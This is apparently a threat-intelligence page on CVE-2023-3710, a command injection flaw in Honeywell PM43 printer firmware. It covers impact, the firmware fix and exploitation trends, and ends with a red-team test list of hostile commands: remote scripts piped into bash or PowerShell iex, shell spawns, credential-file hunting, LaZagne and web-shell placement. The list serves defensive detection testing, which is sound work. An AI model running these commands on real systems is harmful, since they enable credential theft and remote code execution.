CVE-2023-3710
Overview
This vulnerability is a command injection flaw caused by improper input validation in the web page modules of Honeywell PM43 firmware running on 32-bit ARM architecture. The root cause lies in insufficient sanitization of user-supplied input within the printer's web interface components, allowing malicious input to be interpreted as system commands. The affected component is the firmware of Honeywell PM43 printers prior to version P10.19.050004.
Vulnerability Description
Improper Input Validation vulnerability in Honeywell PM43 on 32 bit, ARM (Printer web page modules) allows Command Injection.This issue affects PM43 versions prior to P10.19.050004. Update to the latest available firmware version of the respective printers to version MR19.5 (e.g. P10.19.050006).
Impact
An unauthenticated remote attacker can exploit this vulnerability over the network to execute arbitrary commands on the affected printer with elevated privileges, potentially leading to system compromise or denial of service. No user interaction or authentication is required (AV:N/AC:L/PR:N/UI:N), increasing the attack surface. This can disrupt printing operations and may allow attackers to pivot within the internal network or exfiltrate sensitive data processed by the device.
Solution
Honeywell recommends updating the PM43 printer firmware to version MR19.5 or later, specifically versions P10.19.050006 or higher, to remediate this vulnerability. Detailed firmware update instructions and downloads are available at Honeywell’s official product security page (https://www.honeywell.com/us/en/product-security) and their firmware repositories (e.g., https://hsmftp.honeywell.com/en/Software/Printers/Industrial/PM23-PM23c-PM43-PM43c/Current/Firmware/). Applying these updates is the primary remediation step; no alternative workarounds are documented.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability in the Honeywell PM43 printer series arises from improper input validation within its web page modules, particularly affecting devices running on 32-bit ARM architecture. This flaw allows for command injection, where an attacker can exploit the printer's web interface to execute arbitrary commands on the underlying operating system. The lack of stringent input validation means that malicious inputs can bypass security checks, leading to unauthorized access and control over the device. This vulnerability is particularly concerning as it affects versions prior to P10.19.050004, leaving numerous devices exposed if they have not been updated to the recommended firmware.
Attack vectors for this vulnerability are primarily web-based, as the exploitation occurs through the printer's web interface. An attacker could craft a specially designed HTTP request that includes malicious commands, which the printer would then execute due to the flawed input validation. This could be done remotely, allowing attackers to target devices across networks without physical access. Scenarios could range from simple denial-of-service attacks, where the printer is made inoperable, to more severe outcomes, such as data exfiltration or manipulation of print jobs. The potential for lateral movement within a network also exists, as compromised printers could serve as entry points for further attacks on connected systems.
The real-world impact of this vulnerability is significant, particularly for organizations that rely on the Honeywell PM43 printers for critical operations. The high CVSS score of 9.8 indicates a severe risk, suggesting that successful exploitation could lead to substantial operational disruptions, data breaches, or even compliance violations, depending on the nature of the data processed by the printers. Businesses may face financial losses not only from the immediate effects of an attack but also from the costs associated with incident response, recovery, and potential legal ramifications. Additionally, the reputational damage from a security incident can have long-lasting effects on customer trust and market position.
To detect and mitigate this vulnerability, organizations should prioritize updating affected devices to the latest firmware version, specifically MR19.5 or later. Regularly monitoring and patching devices is essential to maintain security hygiene. Network segmentation can also be employed to limit the exposure of printers to external threats, ensuring that they are not directly accessible from the internet. Implementing intrusion detection systems can help identify unusual traffic patterns or unauthorized access attempts. Furthermore, organizations should conduct regular security assessments and penetration testing to evaluate the effectiveness of their defenses against such vulnerabilities, ensuring that any potential weaknesses are identified and addressed proactively.
In conclusion, the improper input validation vulnerability in the Honeywell PM43 printers poses a critical risk that can lead to severe operational and security implications for affected organizations. Understanding the technical details, potential attack vectors, and real-world impacts is essential for developing effective detection and mitigation strategies. By prioritizing firmware updates and implementing robust security practices, organizations can safeguard their devices and minimize the risk of exploitation.
CSURFACE threat intelligence has identified a marked escalation in detection activity related to CVE-2023-3710, with our telemetry indicating a doubling in observed exploitation attempts. Despite this surge, the EPSS score for this vulnerability has declined significantly, reflecting a reduced likelihood of widespread exploitation in the near term. This divergence suggests that while targeted attacks or proof-of-concept exploitations are increasing, broader adversary adoption remains limited. For defenders, this dynamic underscores the importance of maintaining vigilance, as the vulnerability continues to attract attention from threat actors, potentially including those with capabilities for remote code execution. The updated risk profile remains critical due to the vulnerability’s high severity and potential impact, but the current exploitation trend indicates a more focused rather than pervasive threat environment.
Update 2 — July 08, 2026
CSURFACE threat intelligence has identified a modest uptick in exploitation attempts targeting the Honeywell PM43 vulnerability, reflected by a slight increase in detection activity across our sensors. While the overall exploitation trend remains stable, this subtle rise indicates renewed adversary interest, potentially linked to emerging proof-of-concept exploits circulating within underground forums. The persistence of these attempts, despite the availability of patched firmware, underscores ongoing risk for environments where updates have not been applied. This development elevates the urgency for defenders to monitor for anomalous command injection behaviors, as the vulnerability’s critical severity continues to present a viable vector for remote code execution. Although the threat landscape has not shifted to widespread exploitation, the incremental increase in activity signals that targeted attacks may become more frequent, warranting sustained vigilance in threat detection and response efforts.
Affected Products (1)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Honeywell | Pm43 Firmware | All |
cpe:2.3:o:honeywell:pm43_firmware:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE) | ByteHunter | remote | hardware | - | View |
Threat Feed
5 eventsSighting activity recorded
Sighting activity recorded
Sighting activity recorded
Sighting activity recorded
Public exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (6)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
44 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
netstat -ano
net use
net sessions 2>nul
netstat
who -a
Get-NetTCPConnection | ForEach-Object {
$p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
[pscustomobject]@{
Local = "$($_.LocalAddress):$($_.LocalPort)"
Remote = "$($_.RemoteAddress):$($_.RemotePort)"
State = $_.State
PID = $_.OwningProcess
Process = if ($p) { $p.ProcessName } else { $null }
}
} | Sort-Object State,Process | Format-Table -AutoSize
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
Get-NetTCPConnection
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1 cpan
uname -srm
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
chmod +x #{autosuid}
bash #{autosuid}
chmod +x #{linenum}
bash #{linenum}
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
awk 'BEGIN {system("/bin/sh &")}'
busybox sh &
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
cat /etc/shells
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
xcopy /I /Y "#{web_shells}" #{web_shell_path}
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (4)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2023-3710 |
| honeywell.com |
GitHub CVE
|
https://www.honeywell.com/us/en/product-security |
| hsmftp.honeywell.com:443 |
GitHub CVE
|
https://hsmftp.honeywell.com:443/en/Software/Printers/Industrial/PM23-PM23c-PM43-PM43c/Current/Firmware/firmwaresignedP1019050004 |
| hsmftp.honeywell.com:443 |
GitHub CVE
|
https://hsmftp.honeywell.com:443/en/Software/Printers/Industrial/PM23-PM23c-PM43-PM43c/Current/Firmware/firmwarexasignedP1019050004A |